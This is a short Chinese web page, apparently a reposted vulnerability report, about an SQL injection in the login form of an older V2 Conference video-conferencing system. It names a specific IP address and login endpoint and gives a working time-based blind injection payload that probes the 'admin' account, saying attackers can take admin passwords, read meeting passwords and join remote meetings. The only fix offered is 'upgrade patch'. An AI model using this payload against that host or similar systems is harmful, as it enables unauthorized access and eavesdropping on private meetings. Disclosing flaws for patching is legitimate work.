绿盟视频截图会议系统SQL注入

现在的位置: 故事大全首页 > 生活百科 > 电脑知识 >
 
绿盟视频截图会议系统SQL注入
2016-09-27 01:11:09 /故事大全

通过注入能够拿到管理账户密码,然后登录后台查看会议密码,通过会议密码能够进入到远程会议中,恶意攻击者能够窃取某些敏感信息。

//211.151.49.196:18080/V2Conf/jsp/user/loginAction.do

其实是V2 Conference视频会议系统较低版本的SQL注入,注入发生在登录时用户名的输入框内,使用以下注入语句可测试:

1" or (select benchmark(300000,md5(user())) from users where substring(username,1,5)="admin")#

修复方案:

升级补丁

所属专题:
如果您觉得本文或图片不错,请把它分享给您的朋友吧!

 
搜索
 
栏目导航
 
广告
 
最近发表
 
广告
 
故事大全
 
版权所有- © 2012-2026 · 故事大全 SITEMAP站点地图 Power by Foton Truck手机看故事 站点地图 Power by flip clock online